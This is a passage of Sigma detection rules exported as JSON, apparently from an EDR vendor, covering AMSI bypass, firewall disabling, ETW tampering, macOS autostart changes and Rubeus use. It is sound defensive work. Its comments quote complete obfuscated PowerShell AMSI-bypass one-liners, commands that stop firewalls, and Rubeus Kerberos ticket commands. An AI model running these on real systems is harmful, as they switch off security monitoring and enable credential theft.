"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4b7cfcaf-9e29-4919-b8df-4ffe8ea129b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072101Z",
"creation_date": "2026-03-23T11:45:34.072103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072108Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-PowerShell",
"http://amsi.fail/",
"https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_amsi_bypass.yml",
"content": "title: AMSI Bypassed via PowerShell\nid: 4b7cfcaf-9e29-4919-b8df-4ffe8ea129b2\ndescription: |\n Detects when the Antimalware Scan Interface (AMSI) is being bypassed using a PowerShell script.\n Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\n It is recommended to investigate the PowerShell command and the parent process for suspicious activities.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-PowerShell\n - http://amsi.fail/\n - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/06/22\nmodified: 2025/06/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.AMSIBypass\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # Amsi ScanBuffer Patch\n selection_scanbuffer_patch:\n PowershellCommand|contains|all:\n - 'kernel32'\n - 'GetProcAddress'\n - 'LoadLibrary'\n - 'VirtualProtect'\n - 'amsi'\n\n selection_scanbuffer_patch_inmemory:\n PowershellCommand|contains|all:\n - '[Reflection.Assembly]::Load'\n - 'System.Management.Automation.PSTypeName'\n\n # https://hastebin.com/seyapuzanu.md\n # $A=\"5492868772801748688168747280728187173688878280688776828\"\n # $B=\"1173680867656877679866880867644817687416876797271\"\n # [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).\n # substring(($_*2),2))})-replace \" \" ).\n # GetField([string](38..51|%{[char][int](29+($A+$B).\n # substring(($_*2),2))})-replace \" \",'Non' + 'Public,Static').\n # SetValue($null,$true)\n selection_matt_graebers:\n PowershellCommand|contains|all:\n - '[Ref].Assembly.GetType(*)'\n - 'GetField(*)'\n - 'SetValue($null,$true)'\n - 'Non'\n - 'Public,Static'\n - '[char][int](*)'\n - 'substring'\n - '-replace'\n\n selection_matt_graebers_reflection:\n PowershellCommand|contains|all:\n - 'System.Management.Automation.AmsiUtils'\n - 'amsiInitFailed'\n - 'SetValue'\n\n # Example: [Ref].Assembly.GetType($kdmaqxys).GetField($(('ámsîÎ'+'nítFá'+'íled').NoRmALIZE([chAR](70)+[char](111+94-94)+[CHaR]([bYte]0x72)+[CHaR]([ByTE]0x6d)+[cHAR](38+30)) -replace [ChAr]([bytE]0x5c)+[cHAR](112)+[ChAr]([bYTe]0x7b)+[cHAr](77)+[CHaR]([bYTe]0x6e)+[cHar](125*39/39)),\"NonPublic,Static\").SetValue($IVnsGO,$true);\n selection_matt_graebers_reflection_extended:\n PowershellCommand|contains|all:\n - '[Ref].Assembly.GetType(*).GetField($(*),\"NonPublic,Static\").SetValue(*,$true);'\n - '+[Char]([byte]0x??)'\n\n # Example: [Runtime.InteropServices.Marshal]::(\"$(('Wrít'+'eÎnt'+'32').NoRmAlize([cHAr](70)+[CHAR](20+91)+[cHaR](114)+[chAR](101+8)+[cHar]([ByTe]0x44)) -replace [cHAR]([BytE]0x5c)+[char]([BYte]0x70)+[cHar](123*40/40)+[char](77+68-68)+[cHaR]([BYte]0x6e)+[char](81+44))\")([Ref].Assembly.GetType($rwdjas).GetField(\"$(('àmsì'+'Cónt'+'ext').norMalIZe([ChaR]([bYte]0x46)+[cHar]([BYTe]0x6f)+[CHAr]([BytE]0x72)+[cHAr]([bYtE]0x6d)+[CHAR](68)) -replace [chAR](92*69/69)+[char]([byTE]0x70)+[CHaR]([byte]0x7b)+[CHAr]([bYTe]0x4d)+[CHAR]([byte]0x6e)+[chAr]([ByTe]0x7d))\",[Reflection.BindingFlags]\"NonPublic,Static\").GetValue($S),0x65f00ba7);\n selection_matt_graebers_reflection_second_method:\n PowershellCommand|contains|all:\n - '[Runtime.InteropServices.Marshal]::(\"$(*)\")([Ref].Assembly.GetType(*).GetField(\"$(*)\",[Reflection.BindingFlags]\"NonPublic,Static\").GetValue(*),0x????????);'\n - '+[Char]([byte]0x??)'\n\n # Example: [Delegate]::CreateDelegate((\"Func``3[String, $(([String].Assembly.GetType($([chaR]([bYte]0x53)+[ChAR]([bytE]0x79)+[chAR]([bYte]0x73)+[chaR]([byTe]0x74)+[cHAR](101)+[chAR]([byte]0x6d)+[CHAR]([bYte]0x2e)+[cHAr](82*75/75)+[CHar](101)+[chAR](102+27-27)+[chaR](39+69)+[chAr]([byTE]0x65)+[CHAr]([BYtE]0x63)+[cHaR]([BYte]0x74)+[ChAr](105*47/47)+[Char]([BYTe]0x6f)+[ChaR]([BytE]0x6e)+[ChAr](46)+[chaR](66*17/17)+[ChAr]([BYTe]0x69)+[chAR](110)+[chaR](100*37/37)+[cHAR]([byte]0x69)+[chAR](85+25)+[char](89+14)+[CHar](70)+[ChAR]([BytE]0x6c)+[ChAr](26+71)+[ChAr](53+50)+[cHAR]([bYTE]0x73)))).FullName), $([chaR](83)+[Char](121+89-89)+[CHar]([bytE]0x73)+[ChaR]([bYtE]0x74)+[ChAr]([bYte]0x65)+[ChAr](109*103/103)).Reflection.FieldInfo]\" -as [String].Assembly.GetType($([CHar]([bYtE]0x53)+[Char]([ByTe]0x79)+[cHAR](115+12-12)+[cHAr](116)+[cHar](58+43)+[char]([BYte]0x6d)+[chAR]([bYte]0x2e)+[ChaR](84*5/5)+[ChaR](121+93-93)+[CHaR]([byte]0x70)+[cHaR]([bYTe]0x65)))), [Object]([Ref].Assembly.GetType($qgmaiwhn)),($([CHAR]([byTe]0x47)+[chaR](47+54)+[cHaR]([bYtE]0x74)+[CHAR](70*35/35)+[CHaR]([bYTe]0x69)+[CHar](101*99/99)+[chaR]([byTe]0x6c)+[char](100*25/25)))).Invoke($([char]([byte]0x61)+[cHAr](109)+[chAR]([byTE]0x73)+[ChAR](105)+[CHAr]([BYtE]0x49)+[cHar](23+87)+[ChAr](105)+[cHAR](116+23-23)+[ChAr]([BYte]0x46)+[CHaR](97+54-54)+[ChAr](105+85-85)+[chaR](108*43/43)+[chAR](101*85/85)+[chaR]([BYte]0x64)),((\"NonPublic,Static\") -as [String].Assembly.GetType($([chaR]([bYte]0x53)+[ChAR]([bytE]0x79)+[chAR]([bYte]0x73)+[chaR]([byTe]0x74)+[cHAR](101)+[chAR]([byte]0x6d)+[CHAR]([bYte]0x2e)+[cHAr](82*75/75)+[CHar](101)+[chAR](102+27-27)+[chaR](39+69)+[chAr]([byTE]0x65)+[CHAr]([BYtE]0x63)+[cHaR]([BYte]0x74)+[ChAr](105*47/47)+[Char]([BYTe]0x6f)+[ChaR]([BytE]0x6e)+[ChAr](46)+[chaR](66*17/17)+[ChAr]([BYTe]0x69)+[chAR](110)+[chaR](100*37/37)+[cHAR]([byte]0x69)+[chAR](85+25)+[char](89+14)+[CHar](70)+[ChAR]([BytE]0x6c)+[ChAr](26+71)+[ChAr](53+50)+[cHAR]([bYTE]0x73))))).SetValue($UFfNkIcCX,$True);\n selection_matt_graebers_reflection_method_with_WMF5_autologging_bypass :\n PowershellCommand|contains|all:\n - '[Delegate]::CreateDelegate((\"Func``3[String, $(([String].Assembly.GetType($(*))).FullName), $(*).Reflection.FieldInfo]\" -as [String].Assembly.GetType($(*))), [Object]([Ref].Assembly.GetType($*)),($(*))).Invoke($(*),((\"NonPublic,Static\") -as [String].Assembly.GetType($(*)))).SetValue($*,$True);'\n - '+[Char]([byte]0x??)'\n\n # Example: [Ref].Assembly.GetType(\"$(('Sys'+'tem').NOrMalIze([chaR](46+24)+[chAr](111+75-75)+[Char](114*89/89)+[ChaR]([bytE]0x6d)+[cHar](68+33-33)) -replace [ChaR]([bYte]0x5c)+[cHAr]([byTE]0x70)+[cHAr](123*74/74)+[chaR]([ByTE]0x4d)+[CHar](104+6)+[cHar](125+27-27)).$(('Mänàgeme'+'nt').norMaLIZe([chAR](70*33/33)+[cHAr]([byte]0x6f)+[CHAR](103+11)+[chAr]([bYTE]0x6d)+[CHaR]([bYte]0x44)) -replace [CHar](92*12/12)+[chaR](112+67-67)+[CHar]([byTe]0x7b)+[ChaR]([byte]0x4d)+[CHaR]([BYtE]0x6e)+[CHar]([bytE]0x7d)).$(('Âutóm'+'ãtíôn').nOrmaLIZE([char]([byTe]0x46)+[CHaR](82+29)+[chAR]([ByTE]0x72)+[ChAR](100+9)+[CHaR](68)) -replace [CHar]([bYte]0x5c)+[cHAr]([bYte]0x70)+[ChaR]([bytE]0x7b)+[cHaR](39+38)+[CHAr](110+86-86)+[ChaR]([BYTe]0x7d)).$(('ÀmsîUtí'+'ls').NOrMalIze([Char](70)+[CHar]([bYTE]0x6f)+[CHAR]([bYtE]0x72)+[cHar]([byTe]0x6d)+[CHAR]([ByTe]0x44)) -replace [ChAr]([bYTe]0x5c)+[CHaR](54+58)+[cHar]([BytE]0x7b)+[CHAr](77*23/23)+[chAr](110+30-30)+[chAr](38+87))\").GetField(\"$([CHaR]([BYtE]0x61)+[ChaR]([byTe]0x6d)+[Char]([bYtE]0x73)+[CHar]([bYtE]0x69)+[ChaR]([BYtE]0x53)+[ChaR]([ByTE]0x65)+[ChAr]([BytE]0x73)+[ChAR](115*22/22)+[ChAr](105+89-89)+[cHAr](111*4/4)+[cHAr](7+103))\", \"NonPublic,Static\").SetValue($c, $null);[Ref].Assembly.GetType(\"$(('Sys'+'tem').NOrMalIze([chaR](46+24)+[chAr](111+75-75)+[Char](114*89/89)+[ChaR]([bytE]0x6d)+[cHar](68+33-33)) -replace [ChaR]([bYte]0x5c)+[cHAr]([byTE]0x70)+[cHAr](123*74/74)+[chaR]([ByTE]0x4d)+[CHar](104+6)+[cHar](125+27-27)).$(('Mänàgeme'+'nt').norMaLIZe([chAR](70*33/33)+[cHAr]([byte]0x6f)+[CHAR](103+11)+[chAr]([bYTE]0x6d)+[CHaR]([bYte]0x44)) -replace [CHar](92*12/12)+[chaR](112+67-67)+[CHar]([byTe]0x7b)+[ChaR]([byte]0x4d)+[CHaR]([BYtE]0x6e)+[CHar]([bytE]0x7d)).$(('Âutóm'+'ãtíôn').nOrmaLIZE([char]([byTe]0x46)+[CHaR](82+29)+[chAR]([ByTE]0x72)+[ChAR](100+9)+[CHaR](68)) -replace [CHar]([bYte]0x5c)+[cHAr]([bYte]0x70)+[ChaR]([bytE]0x7b)+[cHaR](39+38)+[CHAr](110+86-86)+[ChaR]([BYTe]0x7d)).$(('ÀmsîUtí'+'ls').NOrMalIze([Char](70)+[CHar]([bYTE]0x6f)+[CHAR]([bYtE]0x72)+[cHar]([byTe]0x6d)+[CHAR]([ByTe]0x44)) -replace [ChAr]([bYTe]0x5c)+[CHaR](54+58)+[cHar]([BytE]0x7b)+[CHAr](77*23/23)+[chAr](110+30-30)+[chAr](38+87))\").GetField(\"$(('äms'+'ìCõ'+'nte'+'xt').NORMAliZe([CHAr]([bYTe]0x46)+[chAR]([bYte]0x6f)+[cHAR](114)+[char](109*54/54)+[CHAR]([BYte]0x44)) -replace [cHar](8+84)+[ChAR](35+77)+[CHAr]([BYtE]0x7b)+[cHAR]([byte]0x4d)+[cHar](110*38/38)+[cHAR]([Byte]0x7d))\", \"NonPublic,Static\").SetValue($null, [IntPtr]$pasaaac);\n selection_unknown_force_error:\n PowershellCommand|contains|all:\n - '[Ref].Assembly.GetType(\"$(*).$(*).$(*).$(*)\").GetField(\"$(*)\", \"NonPublic,Static\").SetValue($*, $null);[Ref].Assembly.GetType(\"$(*).$(*).$(*).$(*)\").GetField(\"$(*)\", \"NonPublic,Static\").SetValue($*, [IntPtr]$*);'\n - '+[Char]([byte]0x??)'\n\n selection_dll_hijack:\n PowershellCommand|contains|all:\n - '$DllBytes'\n - '[System.IO.File]::WriteAllBytes'\n - 'amsi.dll'\n\n selection_nishang_all_in_one_cmdlet:\n PowershellCommand|contains: 'Invoke-AmsiBypass'\n\n selection_nishang_all_in_one_subcmds:\n PowershellCommand|contains|all:\n - 'unload2'\n - 'unloadsilent'\n - 'unloadobfuscated'\n - 'dllhijack'\n - 'psv2'\n - 'obfuscation'\n\n selection_findamsifun:\n PowershellCommand|contains: 'FindAmsiFun'\n\n selection_various:\n PowershellCommand|contains:\n - 'Bypass.AMSI'\n - 'AmsiX64'\n - 'AmsiX32'\n\n # https://github.com/Hackplayers/evil-winrm/blob/master/evil-winrm.rb#L1059\n selection_evil_winrm:\n PowershellCommand|contains: '[Byte[]] (0xb8,0x34,0x12,0x07,0x80,0x66,0xb8,0x32,0x00,0xb0,0x57,0xc3)'\n\n exclusion_pdf_processing:\n PowershellCommand|contains: \"[System.Management.Automation.PSTypeName]'MCopyProtectedPDFProcessingMode'\"\n\n condition: 1 of selection_* and not (selection_scanbuffer_patch_inmemory and exclusion_pdf_processing)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4b7cfcaf-9e29-4919-b8df-4ffe8ea129b2",
"rule_name": "AMSI Bypassed via PowerShell",
"rule_description": "Detects when the Antimalware Scan Interface (AMSI) is being bypassed using a PowerShell script.\nAdversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\nIt is recommended to investigate the PowerShell command and the parent process for suspicious activities.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-06-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bad3446-0e5e-44b4-9fd5-3bb35c6d7625",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086500Z",
"creation_date": "2026-03-23T11:45:34.086502Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086506Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1489/"
],
"name": "t1562_004_disable_firewall.yml",
"content": "title: Firewall Disabled\nid: 4bad3446-0e5e-44b4-9fd5-3bb35c6d7625\ndescription: |\n Detects when a common firewall provider (ufw, firewalld, etc.) is disabled.\n Adversaries may disable or modify the system firewall in order to bypass controls limiting network usage.\n It is recommended to investigate suspicious network connections following this action and to look for other malicious behaviors from the process ancestors.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1489/\ndate: 2021/09/22\nmodified: 2025/07/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.impact\n - attack.t1489\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ServiceStop\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemctl:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n # Optional options can be placed anywhere in the command line (including in between)\n\n # UFW\n - ' stop *ufw'\n - ' disable *ufw'\n\n # firewalld (default on RHEL/CentOS)\n - ' stop *firewalld'\n - ' disable *firewalld'\n\n selection_systemd_manual:\n Image|endswith: '/rm'\n CommandLine|contains:\n - '/etc/systemd/system/multi-user.target.wants/ufw.service'\n - '/etc/systemd/system/multi-user.target.wants/firewalld.service'\n\n selection_ufw_command_disable_python:\n Image:\n - '*/python'\n - '*/python?'\n - '*/python?.?'\n CommandLine:\n - '*ufw* logging* off*'\n - '*ufw* disable*'\n\n # NOTE: This is not detailed in the documentation but ufw use ufw-init script to handle its operations.\n selection_ufw_command_disable:\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/dash'\n - '/zsh'\n CommandLine:\n - '*ufw-init* stop*'\n - '*ufw-init* force-stop*'\n\n exclusion_reload:\n ParentImage|endswith:\n - '/python'\n - '/python?'\n - '/python?.?'\n ParentCommandLine|endswith:\n - ' /sbin/ufw reload'\n - ' /usr/sbin/ufw reload'\n\n exclusion_dpkg:\n GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_enovacom:\n ParentCommandLine: '/bin/bash /enovacom/CPSureProxy/bin/disable_firewalld.sh'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bad3446-0e5e-44b4-9fd5-3bb35c6d7625",
"rule_name": "Firewall Disabled",
"rule_description": "Detects when a common firewall provider (ufw, firewalld, etc.) is disabled.\nAdversaries may disable or modify the system firewall in order to bypass controls limiting network usage.\nIt is recommended to investigate suspicious network connections following this action and to look for other malicious behaviors from the process ancestors.\n",
"rule_creation_date": "2021-09-22",
"rule_modified_date": "2025-07-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bb43217-fb12-4f07-9618-ffcfdc609ae7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085051Z",
"creation_date": "2026-03-23T11:45:34.085053Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/",
"https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_001_windows_etw_disabled.yml",
"content": "title: ETW Disabled via Registry Modification\nid: 4bb43217-fb12-4f07-9618-ffcfdc609ae7\ndescription: |\n Detects a registry modification to set the \"ETWEnabled\" registry key to 0 in order to disable ETW.\n Event Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\n Attackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\n It is recommended to analyze the process responsible for the registry change to look for malicious content or actions.\nreferences:\n - https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/\n - https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2023/03/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled'\n Details:\n - 'DWORD (0x00000000)'\n - 'QWORD (0x00000000-0x00000000)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bb43217-fb12-4f07-9618-ffcfdc609ae7",
"rule_name": "ETW Disabled via Registry Modification",
"rule_description": "Detects a registry modification to set the \"ETWEnabled\" registry key to 0 in order to disable ETW.\nEvent Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\nAttackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\nIt is recommended to analyze the process responsible for the registry change to look for malicious content or actions.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bd7a98e-5886-432f-ba63-9789c0b7ae70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093585Z",
"creation_date": "2026-03-23T11:45:34.093587Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093591Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_autostart_file_modified.yml",
"content": "title: Autostart File Modified\nid: 4bd7a98e-5886-432f-ba63-9789c0b7ae70\ndescription: |\n Detects the login startup file being modified by a suspicious process.\n This file holds which programs should be automatically started when the machine reboots.\n Attackers can modify this file to include their payload, thus establishing a persistence.\n It is recommended to investigate the process that did the modification and what programs was added to the list.\nreferences:\n - https://attack.mitre.org/techniques/T1547/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Path|endswith: 'com.apple.loginwindow.plist'\n Kind: 'write'\n ProcessImage|contains: '?'\n\n filter_legitimate:\n Image|endswith:\n - '/systemmigrationd'\n - '/DesktopServicesHelper'\n - '/diskmanagementd'\n - '/rsync'\n - '/launchd'\n - '/cfprefsd'\n - '/xpcproxy'\n - '/ManagedClient'\n - '/MCXCompositor'\n - '/backupd'\n - '/storagekitd'\n - '/CloneKitService'\n - '/LWWeeklyMessageTracer'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bd7a98e-5886-432f-ba63-9789c0b7ae70",
"rule_name": "Autostart File Modified",
"rule_description": "Detects the login startup file being modified by a suspicious process.\nThis file holds which programs should be automatically started when the machine reboots.\nAttackers can modify this file to include their payload, thus establishing a persistence.\nIt is recommended to investigate the process that did the modification and what programs was added to the list.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547",
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4bda5ac1-8161-4338-88d4-bdb0ab0899ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076783Z",
"creation_date": "2026-03-23T11:45:34.076785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076789Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/GhostPack/Rubeus",
"https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
"https://attack.mitre.org/software/S1071/"
],
"name": "rubeus_usage.yml",
"content": "title: Rubeus HackTool Executed\nid: 4bda5ac1-8161-4338-88d4-bdb0ab0899ac\ndescription: |\n Detects the usage of Rubeus from command-line arguments.\n Rubeus is a C# command-line tool developed to misuse and manipulate Kerberos authentication in Windows Active Directory environments.\n This tool has been used by attackers in ransomware operations.\n It is recommended to verify if the usage of this tool is legitimate using the process tree to gather more information about the execution context, as well as to look for any other malicious behavior on the host.\nreferences:\n - https://github.com/GhostPack/Rubeus\n - https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/\n - https://attack.mitre.org/software/S1071/\ndate: 2020/11/16\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - attack.t1550.002\n - attack.t1550.003\n - attack.s1071\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Rubeus\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos GSS-API, faking delegation:\n # Rubeus.exe tgtdeleg [/target:SPN]\n selection_tgtdeleg:\n CommandLine|contains: ' tgtdeleg '\n\n # Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:\n # Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec]\n # Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:\n # Rubeus.exe asktgt /user:USER /createnetonly:C:\\Windows\\System32\\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec]\n # Retrieve a TGT using a PCKS12 certificate store, start a /netonly process, and to apply the ticket to the new process/logon session:\n # Rubeus.exe asktgt /user:USER /certificate:C:\\temp\\leaked.pfx /createnetonly:C:\\Windows\\System32\\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]\n # Retrieve a TGT using a certificate from the 